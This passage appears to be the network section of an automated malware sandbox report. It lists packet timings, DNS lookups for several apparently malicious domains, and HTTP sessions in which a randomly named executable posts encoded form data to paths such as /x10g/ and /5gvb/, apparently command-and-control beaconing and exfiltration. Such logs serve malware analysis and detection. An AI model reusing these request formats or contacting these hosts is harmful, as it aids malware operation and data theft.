                                              Jul 26, 2024 13:57:53.119908094 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.119921923 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.119983912 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.120012045 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.120034933 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.120064974 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.120105982 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.744334936 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.744472980 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.745533943 CEST4975880192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:54.627418995 CEST4975880192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:55.655805111 CEST4975980192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:55.661268950 CEST8049759203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:55.661341906 CEST4975980192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:55.678356886 CEST4975980192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:55.683525085 CEST8049759203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:56.269808054 CEST8049759203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:56.269840002 CEST8049759203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:56.269958973 CEST4975980192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:56.281194925 CEST4975980192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:56.286067963 CEST8049759203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:58:01.494939089 CEST4976080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:01.500055075 CEST80497603.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:01.500133038 CEST4976080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:01.520011902 CEST4976080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:01.525543928 CEST80497603.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:01.968091011 CEST80497603.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:01.968154907 CEST4976080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:03.030796051 CEST4976080192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:03.035865068 CEST80497603.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:04.068887949 CEST4976180192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:04.073962927 CEST80497613.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:04.074033976 CEST4976180192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:04.096533060 CEST4976180192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:04.101572990 CEST80497613.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:04.542303085 CEST80497613.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:04.542850018 CEST4976180192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:05.608774900 CEST4976180192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:05.617307901 CEST80497613.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.641310930 CEST4976280192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:06.647563934 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.647746086 CEST4976280192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:06.666810036 CEST4976280192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:06.672077894 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672096014 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672108889 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672122002 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672133923 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672146082 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672161102 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672173023 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:06.672185898 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:07.135242939 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:07.135376930 CEST4976280192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:08.171802998 CEST4976280192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:08.177292109 CEST80497623.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:09.210796118 CEST4976380192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:09.216021061 CEST80497633.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:09.216945887 CEST4976380192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:09.235198975 CEST4976380192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:09.242562056 CEST80497633.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:09.696382999 CEST80497633.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:09.696409941 CEST80497633.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:09.696547031 CEST4976380192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:09.706958055 CEST4976380192.168.2.43.33.130.190
                                              Jul 26, 2024 13:58:09.722280025 CEST80497633.33.130.190192.168.2.4
                                              Jul 26, 2024 13:58:15.118810892 CEST4976480192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:15.124010086 CEST8049764103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:15.124097109 CEST4976480192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:15.145391941 CEST4976480192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:15.151241064 CEST8049764103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:16.188232899 CEST8049764103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:16.188775063 CEST8049764103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:16.188838959 CEST4976480192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:16.655575037 CEST4976480192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:17.688535929 CEST4976580192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:17.693696022 CEST8049765103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:17.693783998 CEST4976580192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:17.713274002 CEST4976580192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:17.718835115 CEST8049765103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:19.218797922 CEST4976580192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:19.267316103 CEST8049765103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.257316113 CEST4976680192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:20.263161898 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.263231993 CEST4976680192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:20.286775112 CEST4976680192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:20.291985989 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292045116 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292072058 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292098999 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292146921 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292174101 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292198896 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292246103 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:20.292272091 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:21.796032906 CEST4976680192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:21.843539000 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:23.143615007 CEST4976780192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:23.252674103 CEST8049767103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:23.252768040 CEST4976780192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:23.270807028 CEST4976780192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:23.277683973 CEST8049767103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:23.951246977 CEST8049766103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:23.951322079 CEST4976680192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:27.366667032 CEST8049765103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:27.366741896 CEST4976580192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:27.994468927 CEST8049767103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:27.994875908 CEST8049767103.29.180.74192.168.2.4
                                              Jul 26, 2024 13:58:27.994997978 CEST4976780192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:28.002576113 CEST4976780192.168.2.4103.29.180.74
                                              Jul 26, 2024 13:58:28.013602018 CEST8049767103.29.180.74192.168.2.4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 26, 2024 13:56:45.988498926 CEST5253453192.168.2.41.1.1.1
                                              Jul 26, 2024 13:56:46.002851009 CEST53525341.1.1.1192.168.2.4
                                              Jul 26, 2024 13:57:06.614130020 CEST5869653192.168.2.41.1.1.1
                                              Jul 26, 2024 13:57:06.673705101 CEST53586961.1.1.1192.168.2.4
                                              Jul 26, 2024 13:57:20.427733898 CEST5159153192.168.2.41.1.1.1
                                              Jul 26, 2024 13:57:21.011578083 CEST53515911.1.1.1192.168.2.4
                                              Jul 26, 2024 13:57:34.295300961 CEST5278453192.168.2.41.1.1.1
                                              Jul 26, 2024 13:57:34.354926109 CEST53527841.1.1.1192.168.2.4
                                              Jul 26, 2024 13:57:47.819061041 CEST5312453192.168.2.41.1.1.1
                                              Jul 26, 2024 13:57:47.926206112 CEST53531241.1.1.1192.168.2.4
                                              Jul 26, 2024 13:58:01.318789005 CEST5075153192.168.2.41.1.1.1
                                              Jul 26, 2024 13:58:01.487025023 CEST53507511.1.1.1192.168.2.4
                                              Jul 26, 2024 13:58:14.742822886 CEST6541653192.168.2.41.1.1.1
                                              Jul 26, 2024 13:58:15.109767914 CEST53654161.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 26, 2024 13:56:45.988498926 CEST | 192.168.2.4 | 1.1.1.1 | 0x626b | Standard query (0) | www.accelbusiness.net | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:57:06.614130020 CEST | 192.168.2.4 | 1.1.1.1 | 0xa776 | Standard query (0) | www.bosonserver.net | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:57:20.427733898 CEST | 192.168.2.4 | 1.1.1.1 | 0x2f65 | Standard query (0) | www.hourglasspoise.net | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:57:34.295300961 CEST | 192.168.2.4 | 1.1.1.1 | 0xfb5d | Standard query (0) | www.asymtos.tech | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:57:47.819061041 CEST | 192.168.2.4 | 1.1.1.1 | 0x6ce | Standard query (0) | www.lontos.top | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:58:01.318789005 CEST | 192.168.2.4 | 1.1.1.1 | 0x2065 | Standard query (0) | www.theiconsummit.life | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:58:14.742822886 CEST | 192.168.2.4 | 1.1.1.1 | 0x406 | Standard query (0) | www.accessoriestechbd.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 26, 2024 13:56:46.002851009 CEST | 1.1.1.1 | 192.168.2.4 | 0x626b | No error (0) | www.accelbusiness.net | accelbusiness.net | | CNAME (Canonical name) | IN (0x0001) | false
Jul 26, 2024 13:56:46.002851009 CEST | 1.1.1.1 | 192.168.2.4 | 0x626b | No error (0) | accelbusiness.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:56:46.002851009 CEST | 1.1.1.1 | 192.168.2.4 | 0x626b | No error (0) | accelbusiness.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:57:06.673705101 CEST | 1.1.1.1 | 192.168.2.4 | 0xa776 | No error (0) | www.bosonserver.net | bosonserver.net | | CNAME (Canonical name) | IN (0x0001) | false
Jul 26, 2024 13:57:06.673705101 CEST | 1.1.1.1 | 192.168.2.4 | 0xa776 | No error (0) | bosonserver.net | | 195.200.3.58 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:57:21.011578083 CEST | 1.1.1.1 | 192.168.2.4 | 0x2f65 | No error (0) | www.hourglasspoise.net | hourglasspoise.net | | CNAME (Canonical name) | IN (0x0001) | false
Jul 26, 2024 13:57:21.011578083 CEST | 1.1.1.1 | 192.168.2.4 | 0x2f65 | No error (0) | hourglasspoise.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:57:21.011578083 CEST | 1.1.1.1 | 192.168.2.4 | 0x2f65 | No error (0) | hourglasspoise.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:57:34.354926109 CEST | 1.1.1.1 | 192.168.2.4 | 0xfb5d | No error (0) | www.asymtos.tech | asymtos.tech | | CNAME (Canonical name) | IN (0x0001) | false
Jul 26, 2024 13:57:34.354926109 CEST | 1.1.1.1 | 192.168.2.4 | 0xfb5d | No error (0) | asymtos.tech | | 217.160.164.240 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:57:47.926206112 CEST | 1.1.1.1 | 192.168.2.4 | 0x6ce | No error (0) | www.lontos.top | | 203.161.42.162 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:58:01.487025023 CEST | 1.1.1.1 | 192.168.2.4 | 0x2065 | No error (0) | www.theiconsummit.life | theiconsummit.life | | CNAME (Canonical name) | IN (0x0001) | false
Jul 26, 2024 13:58:01.487025023 CEST | 1.1.1.1 | 192.168.2.4 | 0x2065 | No error (0) | theiconsummit.life | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:58:01.487025023 CEST | 1.1.1.1 | 192.168.2.4 | 0x2065 | No error (0) | theiconsummit.life | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:58:15.109767914 CEST | 1.1.1.1 | 192.168.2.4 | 0x406 | No error (0) | www.accessoriestechbd.com | accessoriestechbd.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 26, 2024 13:58:15.109767914 CEST | 1.1.1.1 | 192.168.2.4 | 0x406 | No error (0) | accessoriestechbd.com | | 103.29.180.74 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49743 | 3.33.130.190 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 13:56:46.052898884 CEST | 434 | OUT | GET /sg0d/?r4HtI=inDHeTS0D6JHi&bPD=ZFII8SVAvGzgMmVXT4ZY+5svGFARRAPMY6hEAWMgzd/rbIPLPNZ+nr66isGJwkaWRyig0DUujo2cMsRd49nDMp6VdguE/ogC4VFXU40D/gpWgkUbHmnCm4E= HTTP/1.1
                                              Host: www.accelbusiness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
Jul 26, 2024 13:56:46.525693893 CEST | 399 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Fri, 26 Jul 2024 11:56:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 259
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?r4HtI=inDHeTS0D6JHi&bPD=ZFII8SVAvGzgMmVXT4ZY+5svGFARRAPMY6hEAWMgzd/rbIPLPNZ+nr66isGJwkaWRyig0DUujo2cMsRd49nDMp6VdguE/ogC4VFXU40D/gpWgkUbHmnCm4E="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49744 | 195.200.3.58 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 13:57:06.716505051 CEST | 694 | OUT | POST /x10g/ HTTP/1.1
                                              Host: www.bosonserver.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.bosonserver.net
                                              Referer: http://www.bosonserver.net/x10g/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Ascii: bPD=NvgJa+SucRLEOHANZpfT0s4TR7rn0SoTfJh/nDv4w4RqRpT5IGKVdh/eV9pXJKiN4iMkXB8np1iLJvOm221m0tTrP8cy4ZgLA3+ueO1DY9RKaYYIVcOiDXotuUeec3z0qAp0vnXLyYgQ26A611fOvnQ0G7e7IHQFeZG/yGuIHEFY2tdJ+ffxsVT8iK/BU1ss0g==
Jul 26, 2024 13:57:07.403541088 CEST | 1068 | IN | HTTP/1.1 301 Moved Permanently
                                              Connection: close
                                              content-type: text/html
                                              content-length: 795
                                              date: Fri, 26 Jul 2024 11:57:07 GMT
                                              server: LiteSpeed
                                              location: https://www.bosonserver.net/x10g/
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.4 | 49745 | 195.200.3.58 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:57:09.309747934 CEST | 714 | OUT | POST /x10g/ HTTP/1.1
                                              Host: www.bosonserver.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.bosonserver.net
                                              Referer: http://www.bosonserver.net/x10g/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Ascii: bPD=NvgJa+SucRLEPncNWq3Tg84QebrniipYfJt/nBDWwK1qRJj5JFSVah/eSNodRqjP4iBRXAQnp0GLJtWmxA9h29TpJ8cwmpgLA3+ueOhtY9JKG7QIH9Ohdnoym0eeWnzwqApGvmLhyaYQ27w60hLB2XQyMbfMJXtoer3E7gm3GVFB3rMTvu+m+V3P/N21Z2RlvlPq86nldMlbwHykVAVZSTE=
                                              Jul 26, 2024 13:57:10.034441948 CEST | 1068 | IN | HTTP/1.1 301 Moved Permanently
                                              Connection: close
                                              content-type: text/html
                                              content-length: 795
                                              date: Fri, 26 Jul 2024 11:57:09 GMT
                                              server: LiteSpeed
                                              location: https://www.bosonserver.net/x10g/
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              3 | 192.168.2.4 | 49746 | 195.200.3.58 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:57:11.917023897 CEST | 10796 | OUT | POST /x10g/ HTTP/1.1
                                              Host: www.bosonserver.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.bosonserver.net
                                              Referer: http://www.bosonserver.net/x10g/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Ascii: bPD= [TRUNCATED]
                                              Jul 26, 2024 13:57:12.627418041 CEST | 1068 | IN | HTTP/1.1 301 Moved Permanently
                                              Connection: close
                                              content-type: text/html
                                              content-length: 795
                                              date: Fri, 26 Jul 2024 11:57:12 GMT
                                              server: LiteSpeed
                                              location: https://www.bosonserver.net/x10g/
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              4 | 192.168.2.4 | 49747 | 195.200.3.58 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:57:14.568001986 CEST | 432 | OUT | GET /x10g/?bPD=AtIpZIbrclbIO3wVVorP/+4YW7XwgThFYZcx/yn27KMXet/sCHbTQiCzWIx6Kv/NnE9nJScnuF31JPyJpxVQ15qsd8YhwJ4GP0n6fMl4YdtRcYZTZezTcHY=&r4HtI=inDHeTS0D6JHi HTTP/1.1
                                              Host: www.bosonserver.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Jul 26, 2024 13:57:15.382633924 CEST | 1213 | IN | HTTP/1.1 301 Moved Permanently
                                              Connection: close
                                              content-type: text/html
                                              content-length: 795
                                              date: Fri, 26 Jul 2024 11:57:15 GMT
                                              server: LiteSpeed
                                              location: https://www.bosonserver.net/x10g/?bPD=AtIpZIbrclbIO3wVVorP/+4YW7XwgThFYZcx/yn27KMXet/sCHbTQiCzWIx6Kv/NnE9nJScnuF31JPyJpxVQ15qsd8YhwJ4GP0n6fMl4YdtRcYZTZezTcHY=&r4HtI=inDHeTS0D6JHi
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              5 | 192.168.2.4 | 49748 | 3.33.130.190 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:57:21.050584078 CEST | 703 | OUT | POST /5gvb/ HTTP/1.1
                                              Host: www.hourglasspoise.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.hourglasspoise.net
                                              Referer: http://www.hourglasspoise.net/5gvb/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Ascii: bPD=ye0dAO7TakWo0Ji2tg+2d/Qr7WPIngtJMv2NiRAsuuqaU4zfZ2eJzNbst0o3fUg9F/cKwMm1xff+A1yZnTbr5svsLmTPJBHzW8s6gW3mpinsE94LXPIyooG2xIwNkqLCadQ6Vna8iL/CR8w3W6gtkX1DCoPCfDBuXG1qnbacevjVTJBvF+q7ADzxh1d4CnkDlg==


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              6 | 192.168.2.4 | 49749 | 3.33.130.190 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:57:23.617557049 CEST | 723 | OUT | POST /5gvb/ HTTP/1.1
                                              Host: www.hourglasspoise.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Cache-Control: no-cache
                                              Connection: close
                                              Origin: http://www.hourglasspoise.net
                                              Referer: http://www.hourglasspoise.net/5gvb/
                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                                              Data Ascii: bPD=ye0dAO7TakWo0pS2hjW2bfQq32PItAtNMuKNiRo8udCaUdPfYyCJ0NbsmUoyS0g6F/QCwNq1xb3+Ax+ZywDq/8vuDGTRWRHzW8s6gWK9pjDsFMILGeIx04G32IwNgqLGadRfVmHTiJ3CR443WrgsuX1NdYOmPjFnY0wtgoy8R8r4SPQ1UPLsSDXC8yUMPkZK+vF4clPBEISuXePCa4G5Knk=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.2.4 | 49750 | 3.33.130.190 | 80 | 5580 | C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 26, 2024 13:57:26.203167915 CEST | 10805 | OUT | POST /5gvb/ HTTP/1.1
                                              Host: www.hourglasspoise.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
